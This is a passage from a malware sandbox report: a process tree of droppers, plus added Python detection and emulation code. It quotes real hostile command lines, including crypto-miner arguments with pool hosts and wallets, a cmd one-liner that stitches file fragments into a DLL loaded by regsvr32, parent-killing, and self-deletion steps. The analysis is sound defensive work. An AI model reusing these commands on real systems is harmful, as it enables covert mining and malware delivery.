            C:\Users\Admin\AppData\Local\Temp\RarSFX2\note8876.exe  (PID 5764)
              cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\note8876.exe"
              - Executes dropped EXE
              - Checks whether UAC is enabled
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\hbggg.exe  (PID 4320)
              cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hbggg.exe"
              - Executes dropped EXE
              - Adds Run key to start application
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  (PID 2608)
                  cmd: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  - Executes dropped EXE
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe  (PID 5316)
                  cmd: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  - Executes dropped EXE
                  - Suspicious behavior: EnumeratesProcesses

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe  (PID 356)
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\browser_broker.exe  (PID 2476)
  cmd: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (PID 4624)
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (PID 3300)
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies Internet Explorer settings
  - Modifies registry class

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (PID 5348)
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (PID 2104)
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (PID 5136)
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class

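The tree above is worth reading as a set of command-line tells rather than as a list of file names: two msiexec.exe children of 1A1B.tmp.exe whose command lines are nothing but miner arguments (a stratum URL, a pool host and a wallet) and never name msiexec at all, a parent flagged with SetThreadContext, which is the shape of a hollowed system binary; 5191048.exe and 2600165.exe relaunching themselves with the literal `"{path}"` as their only argument; 1597176.exe starting an argument-less AddInProcess32.exe; regsvr32 loading a file with a `.7V` extension and rundll32 loading a DLL from Temp; and cmd.exe one-liners that clone a binary with TYPE, kill the parent with taskkill, or wait on timeout/ping before deleting the dropper. The following Python is an added example, not part of the report or of any vendor's rule set: it encodes those tells as rules and runs them over rows copied from the tree (the Chrome line abridged). Rule names, regexes and the USER_WRITABLE directory list are this example's own assumptions.

```python
"""Command-line triage rules for a sandbox process tree.

Added example, not part of the original report or of any vendor's rule set.
SAMPLE rows are copied from the process tree above (Chrome line abridged);
rule names, regexes and USER_WRITABLE are this example's own assumptions.
"""
import re

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
DLL_LOADERS = ("regsvr32.exe", "rundll32.exe")
MINER_RE = re.compile(
    r"stratum\d*\+(?:ssl|tcp)://|--cpu-max-threads-hint|--farm-retries"
    r"|(?:^|\s)-o\s+\S+:\d+\s.*\s-u\s+\S+")


def _basename(path: str) -> str:
    return path.strip('"').rstrip("\\").rsplit("\\", 1)[-1].lower()


def _argv0(cmdline: str) -> str:
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def _dll_target_ok(cmdline: str) -> bool:
    """regsvr32/rundll32 target has a DLL-like extension and is not in a user-writable dir."""
    toks = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', cmdline)][1:]
    targets = [t for t in toks if not t.startswith(("/", "-"))]
    if not targets:
        return True
    target = targets[0].split(",")[0]                  # rundll32 form: lib.dll,Export
    name = _basename(target)
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    return ext in ("dll", "ocx", "ax", "cpl") and not any(d in target for d in USER_WRITABLE)


def triage(image: str, cmdline: str) -> list[str]:
    """Return the rule tags that fire for one process; [] means nothing odd."""
    img, cl = _basename(image), cmdline.lower()
    tags = []
    if cl.strip() in ('"{path}"', "{path}"):
        tags.append("unexpanded-path-placeholder")   # loader relaunched itself with a template literal
    elif _basename(_argv0(cl)) not in (img, img.removesuffix(".exe")):
        tags.append("argv0-mismatch")                # cmdline written for another binary: hollowed image
    if MINER_RE.search(cl):
        tags.append("miner-args")
    if img in ("addinprocess32.exe", "addinprocess.exe") and len(cl.split()) == 1:
        tags.append("dotnet-injection-host")
    if img in DLL_LOADERS and not _dll_target_ok(cl):
        tags.append("lolbin-nonstandard-dll")
    if "set /p" in cl and '"mz"' in cl and "copy /b" in cl:
        tags.append("pe-stitch-copy-b")
    if re.search(r'type\s+"[^"]+\.exe"\s*>\s*\S+\s*&&\s*start', cl):
        tags.append("type-clone-and-relaunch")
    if re.search(r"\btaskkill\s+/f\s+[-/]im\b", cl):
        tags.append("taskkill-parent")
    if ("timeout /t" in cl or "ping 127.0.0.1" in cl) and re.search(r"\bdel\b", cl):
        tags.append("delayed-self-delete")
    return tags


def triage_tree(rows):
    """rows: iterable of (pid, image, cmdline); returns {pid: tags} for rows that fire."""
    return {pid: tags for pid, image, cmdline in rows if (tags := triage(image, cmdline))}


# (pid, image, command line) copied from the tree above; benign and malicious rows mixed
SAMPLE = [
    (5396, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --renderer-client-id=52 /prefetch:1'),
    (5492, r"C:\Windows\System32\rundll32.exe",
     r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding"),
    (5888, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"> ..\DuAHpZZ.eXe && START ..\DuaHPZz.exe /PFYuNZ3YH7rnGdojnKG & IF "" =="" for%a in ("C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -im "%~nxa" > nUL'),
    (6028, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /cEChO | sET /p = "MZ" > N_dF.5TS & coPY /b /Y N_df.5TS+ZStGPF.Z + Y5GIu_SZ.Hk + HSUF.~No + YS5KQR.dP +XHHm_.HW+ Fi3ni~X.GT + J_DWF.9I + 2AZqC.EK+ j9KBFF~.BZX+EZMJlRKC.Zv ..\hVzCtOPX.7V > nUl & STaRT regsvr32 /U ..\HVzCtOPx.7V -s & DEl /q * > NUl'),
    (1044, r"C:\Windows\SysWOW64\regsvr32.exe", r"regsvr32 /U ..\HVzCtOPx.7V -s"),
    (5592, r"C:\Windows\SysWOW64\cmd.exe",
     r'cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\24C.tmp.exe"'),
    (4996, r"C:\Windows\system32\msiexec.exe",
     r"-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w14456@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999"),
    (364, r"C:\Windows\system32\msiexec.exe",
     r"-o pool.minexmr.com:4444 -u 87rRyMkZM4pNgAZPi5NX3DdxksaoNgd7bZUBVe3A9uemAhxc8EQJ6dAPZg2mYTwoezgJWNfTpFFmnVYWXqcNDMhLF7ihFgM.w23936 --cpu-max-threads-hint 50 -r 9999"),
    (5164, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1"),
    (188, r"C:\Windows\SysWOW64\rUNdlL32.eXe",
     r'"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install'),
    (1772, r"C:\Users\Admin\AppData\Roaming\5191048.exe", '"{path}"'),
    (5652, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     r"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe"),
]

if __name__ == "__main__":
    for pid, tags in triage_tree(SAMPLE).items():
        print(pid, ", ".join(tags))
```

The argv0 check is the cheapest hollowing heuristic here: a process whose command line carries no argv[0] at all (or one naming a different binary) was not started by a normal CreateProcess of its own image. Tune USER_WRITABLE and the miner regex to your estate; rundll32 with a DLL under AppData and regsvr32 on a non-DLL extension are rare enough in fleets to alert on directly.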
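The cmd.exe line under DuAHpZZ.eXe (PID 6028) shows how the regsvr32 payload reaches disk: `echo | set /p = "MZ" > N_dF.5TS` writes the two DOS-magic bytes with no trailing newline, `copy /b` appends ten extension-less fragments onto them, and `regsvr32 /U ..\HVzCtOPx.7V -s` loads the result. None of the fragments dropped by the RarSFX stage carries an MZ header, so a per-file PE check never sees an executable; only the stitched output does. The Python below is an added example, not code from the report: it parses that one-liner for the fragment order and destination, then reproduces the stitching on a constructed stand-in image (the real DLL is not on this page) to show where the header appears. The fake PE, its size and its fragment contents are this example's own constructions.

```python
"""Emulate the cmd.exe fragment-stitching step from the tree above.

Added example, not part of the original report. Only the command line is
taken from the page; the stand-in PE image and fragment contents are
constructed here so the code runs offline.
"""
import re
import struct

STITCH_CMDLINE = (r'"C:\Windows\system32\cmd.exe" /cEChO | sET /p = "MZ" > N_dF.5TS & coPY /b /Y '
                  r'N_df.5TS+ZStGPF.Z + Y5GIu_SZ.Hk + HSUF.~No + YS5KQR.dP +XHHm_.HW+ Fi3ni~X.GT + J_DWF.9I + '
                  r'2AZqC.EK+ j9KBFF~.BZX+EZMJlRKC.Zv ..\hVzCtOPX.7V > nUl & STaRT regsvr32 /U ..\HVzCtOPx.7V -s & DEl /q * > NUl')


def parse_stitch(cmdline: str):
    """Split the one-liner into (prompt bytes, prompt file, ordered sources, destination, loader cmd).

    `echo | set /p = "MZ" > f` prints the prompt text to f with no newline, so f holds
    exactly the 2-byte DOS magic; `copy /b a+b+... dest` appends the fragments in order;
    `start regsvr32 /U dest -s` loads the result. Names are lower-cased because NTFS
    lookups are case-insensitive (the line itself mixes N_dF.5TS and N_df.5TS).
    """
    prompt = re.search(r'set\s*/p\s*=\s*"([^"]*)"\s*>\s*(\S+)', cmdline, re.I)
    chain = re.search(r'copy\s+/b(?:\s+/y)?\s+(.*?)\s*>', cmdline, re.I)
    loader = re.search(r'start\s+(regsvr32[^&]*)', cmdline, re.I)
    parts = re.sub(r'\s*\+\s*', '+', chain.group(1)).split()   # normalise "a + b" to "a+b"
    sources = [s.lower() for s in '+'.join(parts[:-1]).split('+')]
    return (prompt.group(1).encode(), prompt.group(2).lower(), sources,
            parts[-1].lower(), loader.group(1).strip())


def build_fake_pe(size: int = 0x400) -> bytes:
    """Constructed stand-in for the dropped DLL: DOS magic, e_lfanew and PE signature only."""
    e_lfanew = 0x80
    img = bytearray(size)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", img, e_lfanew + 4, 0x8664)   # IMAGE_FILE_MACHINE_AMD64
    return bytes(img)


def fragment_like_dropper(pe: bytes, names: list[str]) -> dict[str, bytes]:
    """Spread the image minus its 2-byte magic across the fragment names, as the RarSFX
    stage leaves them on disk: no fragment carries an MZ header."""
    body, n = pe[2:], len(names)
    step = -(-len(body) // n)                            # ceiling division
    return {name: body[i * step:(i + 1) * step] for i, name in enumerate(names)}


def stitch(on_disk: dict[str, bytes], prompt: bytes, prompt_file: str, sources: list[str]) -> bytes:
    """What cmd.exe produces: prompt file written first, then copy /b in source order."""
    files = dict(on_disk)
    files[prompt_file] = prompt
    return b"".join(files[s] for s in sources)


def looks_like_pe(data: bytes) -> bool:
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def demo() -> dict:
    prompt, prompt_file, sources, dest, loader = parse_stitch(STITCH_CMDLINE)
    fragments = fragment_like_dropper(build_fake_pe(), sources[1:])   # sources[0] is the prompt file
    assembled = stitch(fragments, prompt, prompt_file, sources)
    return {
        "fragment_count": len(fragments),
        "any_fragment_is_pe": any(looks_like_pe(f) for f in fragments.values()),
        "assembled_is_pe": looks_like_pe(assembled),
        "dest": dest,
        "loader": loader,
    }


if __name__ == "__main__":
    print(demo())
```

On a live host the same parse gives you the list of files to collect from the working directory before `DEl /q *` runs, and `stitch` over the real fragments yields the DLL for static analysis; the order matters, so take it from the command line rather than from directory listing order.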
Network
MITRE ATT&CK Enterprise v6
Downloads
- MD5    54a8641614f11b699f50d96ead93ef70
  SHA1   b7993d550bb46d49a5a3577a554efd752d347a93
  SHA256 f9027efe8b397769aaf1a9e8f214ccc768dbd9932f60422302c39a200b4f93f0
  SHA512 448c5145829a45b3743f5ac293d49314c989956a702c4398399df745b55651216c6b1a0d5fa687287bd881d87a786e7938ece358e375bd9660f69a9bf66d1fa2
- MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (these are the digests of a zero-byte file: this download entry carries no content)
- MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (these are the digests of a zero-byte file: this download entry carries no content)